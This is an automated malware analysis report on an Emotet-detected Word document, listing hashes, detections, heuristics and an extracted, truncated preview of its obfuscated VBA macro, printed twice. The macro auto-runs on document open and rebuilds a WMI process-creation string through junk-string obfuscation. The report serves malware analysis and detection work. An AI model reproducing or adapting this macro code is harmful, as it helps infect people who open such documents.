Emotet Office (OLE) malware analysis — malicious · e11c5acfd7962cbf

MALICIOUS

Office (OLE)

201.2 KB Created: 2020-08-19 14:38:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 2c03a2624e0c9679d45f74f905549233 SHA-1: badc22389fc504b9a7189b25585085e8eb0a4ef5 SHA-256: e11c5acfd7962cbfc0d24bd96833b535c52e148b42d4181feae6ea497f2fc228

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro, combined with a hidden-property command stager and CreateObject calls, strongly suggests it's designed to execute arbitrary code. The ClamAV detection as 'Doc.Downloader.Emotet-9479964-0' further supports this, indicating a downloader functionality, likely for a second-stage payload. The embedded URL is benign.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-9479964-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-9479964-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15386 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15386 bytes
SHA-256: `e118615136836aff33c977cedaa0d4d0494e75f2554244c597c65c224914a388`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Rmddnsexzmthik7y8" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Ef2kh_dio8c.Z4nhflsu1xpe End Sub Attribute VB_Name = "Ef2kh_dio8c" Attribute VB_Base = "0{650FB411-4F9F-4131-B6E6-425CF8D5BF7B}{47FB0A9A-6124-4BD4-BE9A-A2389BA3585D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Z4nhflsu1xpe() C595f28on5b = "979" If Len("U0p35i_m52d0Eomlb6eqlgo0vq") = Len("Bg3mjukbzis3v2") + 1 Then End If Len("J10p_nucl083rA5j4vky_3167nydudSa4yagqbsdqnn45") < Len("Rpj0aqwn0jue") Then MsgBox "X037nbq_o4c" + "O4vtomcbe_zle" MsgBox ("Hpqz3xmbvezsa2o") MsgBox "Hwgwqxb5v8rc7" + "Hr353buzbqathq68ml" End If If Len("W1desdxnwe6fjfy6Sg_m1wv2w9pw") = Len("Rvfoaihmk1ez0uhk2n") Then MsgBox "Pygfmlgdto7fh2x" + "H_6eqy6qq6y2co" MsgBox ("Wu7alsp5d6ez0o !!!") MsgBox "Y9ld8l7je941zry" + "Bf9awm2l07f3kl" End If Drkl2ilu399rjij0c = Ef2kh_dio8c.HelpContextId + 50 + 50 S8mvp4pa8m9dxf85t = "456" If Len("Z7jmyasi_7m2fuA98hmuki3e0xvf_") = Len("Y5njvwnjlch4u") + 1 Then End If Len("Dgnvwh_xg81xshznB_xo83l0pvx7jnrzd_G_u4jlxru9efu9fe5") < Len("Hipcxgxn39ti9oi8d9") Then MsgBox "Fnckl2alpd9ejy3" + "Tohmnf8u10la18y6h" MsgBox ("Puh0dlx7hj54kvg") MsgBox "Mt8wfcqsumqawtq" + "Xxciw4k71s0" End If If Len("T8z26epe9wrtd1o3Qkz527xt0_1jb7xe53") = Len("Rzfrdlflgte8ot_c") Then MsgBox "G5abbi8e1781" + "Lk92dhr4vtvuq_5dl" MsgBox ("A4p6_3xwrjmopjwn !!!") MsgBox "V0yp4wpylpr" + "Gcbpf78ovkger1h" End If Hj0l51lie_6d = ChrW(Drkl2ilu399rjij0c + (15)) Afi69jfoqlenf4 = "499" If Len("Ssixt8enip2Od90vrvo4ingin9xwx") = Len("N8m1ewl0v74aph") + 1 Then End If Len("Oksmt7upjrfbpZs3v9icio5nkAsai9_04yejev0r") < Len("G_u84wobqs_") Then MsgBox "I7z_jnt8jjhb" + "Jlosqmjvfg64n2" MsgBox ("D03pa2r3qk7iqv") MsgBox "Z3tqplat_g1wg15g7" + "D4kr4b18u9ivd5al" End If If Len("Ck9ldeq4jkflQd_wk3ut_s2") = Len("Tclpc8v6u180lcy") Then MsgBox "Rt2vwslevsti3xe4g" + "Iceohours8hbkie16" MsgBox ("Tg8j2h5uond8wd !!!") MsgBox "N2w1kmnafap8thkeb" + "Rba7cl9ux_hovlek3" End If Q2rvfhbfk5_d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Hj0l51lie_6d + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ef2kh_dio8c.Exm4e742cxztex + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" D5hh6pala5hsb8l = "269" If Len("A9no8t6lgqor7q0T2l0p4mgxtda3fio") = Len("Jktayww_8bpauqv") + 1 Then End If Len("M2lwmgivh2nq5tahaNfp1ce10t29fddsglY4jhb059jffnah") < Len("R9pp2zg7nxrybyk9yi") Then MsgBox "Hiwldr8e7u4g11go" + "C2vz287uul4k" MsgBox ("Fseo93dxm95ullur30") MsgBox "Ge68y0tl13tge67nl" + "I3olt252eqv" End If If Len("C4m9b6mvrppqnU311p0ippgq9wed85") = Len("Soz15g4ba2v") Then MsgBox "I00y0baoaxdyofreji" + "Ovm2_gc9u8o0s6" MsgBox ("Vs_9gb8qcdlamy !!!") MsgBox "S33jam_i_s7errxy" + "V8l0emcpyfkxyf2" End If Vwtu87kzkukct = Ccowrdcwmsdz(Q2rvfhbfk5_d) Yl9exfrpr_f1zcfd6z = "988" If Len("Zohz7bpt9mf_5oK59rx6_9s3l_q6") = Len("Knsqiu2wbdhxucl") + 1 Then End If Len("Illzmgncu0qz9uc ... (truncated)

SHA-256: e118615136836aff33c977cedaa0d4d0494e75f2554244c597c65c224914a388

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Rmddnsexzmthik7y8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ef2kh_dio8c.Z4nhflsu1xpe
End Sub


Attribute VB_Name = "Ef2kh_dio8c"
Attribute VB_Base = "0{650FB411-4F9F-4131-B6E6-425CF8D5BF7B}{47FB0A9A-6124-4BD4-BE9A-A2389BA3585D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Z4nhflsu1xpe()
   C595f28on5b = "979"
If Len("U0p35i_m52d0Eomlb6eqlgo0vq") = Len("Bg3mjukbzis3v2") + 1 Then End
If Len("J10p_nucl083rA5j4vky_3167nydudSa4yagqbsdqnn45") < Len("Rpj0aqwn0jue") Then
        MsgBox "X037nbq_o4c" + "O4vtomcbe_zle"
        MsgBox ("Hpqz3xmbvezsa2o")
        MsgBox "Hwgwqxb5v8rc7" + "Hr353buzbqathq68ml"
End If
If Len("W1desdxnwe6fjfy6Sg_m1wv2w9pw") = Len("Rvfoaihmk1ez0uhk2n") Then
       MsgBox "Pygfmlgdto7fh2x" + "H_6eqy6qq6y2co"
       MsgBox ("Wu7alsp5d6ez0o !!!")
       MsgBox "Y9ld8l7je941zry" + "Bf9awm2l07f3kl"
End If

Drkl2ilu399rjij0c = Ef2kh_dio8c.HelpContextId + 50 + 50
   S8mvp4pa8m9dxf85t = "456"
If Len("Z7jmyasi_7m2fuA98hmuki3e0xvf_") = Len("Y5njvwnjlch4u") + 1 Then End
If Len("Dgnvwh_xg81xshznB_xo83l0pvx7jnrzd_G_u4jlxru9efu9fe5") < Len("Hipcxgxn39ti9oi8d9") Then
        MsgBox "Fnckl2alpd9ejy3" + "Tohmnf8u10la18y6h"
        MsgBox ("Puh0dlx7hj54kvg")
        MsgBox "Mt8wfcqsumqawtq" + "Xxciw4k71s0"
End If
If Len("T8z26epe9wrtd1o3Qkz527xt0_1jb7xe53") = Len("Rzfrdlflgte8ot_c") Then
       MsgBox "G5abbi8e1781" + "Lk92dhr4vtvuq_5dl"
       MsgBox ("A4p6_3xwrjmopjwn !!!")
       MsgBox "V0yp4wpylpr" + "Gcbpf78ovkger1h"
End If

Hj0l51lie_6d = ChrW(Drkl2ilu399rjij0c + (15))
   Afi69jfoqlenf4 = "499"
If Len("Ssixt8enip2Od90vrvo4ingin9xwx") = Len("N8m1ewl0v74aph") + 1 Then End
If Len("Oksmt7upjrfbpZs3v9icio5nkAsai9_04yejev0r") < Len("G_u84wobqs_") Then
        MsgBox "I7z_jnt8jjhb" + "Jlosqmjvfg64n2"
        MsgBox ("D03pa2r3qk7iqv")
        MsgBox "Z3tqplat_g1wg15g7" + "D4kr4b18u9ivd5al"
End If
If Len("Ck9ldeq4jkflQd_wk3ut_s2") = Len("Tclpc8v6u180lcy") Then
       MsgBox "Rt2vwslevsti3xe4g" + "Iceohours8hbkie16"
       MsgBox ("Tg8j2h5uond8wd !!!")
       MsgBox "N2w1kmnafap8thkeb" + "Rba7cl9ux_hovlek3"
End If

Q2rvfhbfk5_d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Hj0l51lie_6d + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ef2kh_dio8c.Exm4e742cxztex + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   D5hh6pala5hsb8l = "269"
If Len("A9no8t6lgqor7q0T2l0p4mgxtda3fio") = Len("Jktayww_8bpauqv") + 1 Then End
If Len("M2lwmgivh2nq5tahaNfp1ce10t29fddsglY4jhb059jffnah") < Len("R9pp2zg7nxrybyk9yi") Then
        MsgBox "Hiwldr8e7u4g11go" + "C2vz287uul4k"
        MsgBox ("Fseo93dxm95ullur30")
        MsgBox "Ge68y0tl13tge67nl" + "I3olt252eqv"
End If
If Len("C4m9b6mvrppqnU311p0ippgq9wed85") = Len("Soz15g4ba2v") Then
       MsgBox "I00y0baoaxdyofreji" + "Ovm2_gc9u8o0s6"
       MsgBox ("Vs_9gb8qcdlamy !!!")
       MsgBox "S33jam_i_s7errxy" + "V8l0emcpyfkxyf2"
End If

Vwtu87kzkukct = Ccowrdcwmsdz(Q2rvfhbfk5_d)
   Yl9exfrpr_f1zcfd6z = "988"
If Len("Zohz7bpt9mf_5oK59rx6_9s3l_q6") = Len("Knsqiu2wbdhxucl") + 1 Then End
If Len("Illzmgncu0qz9uc
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.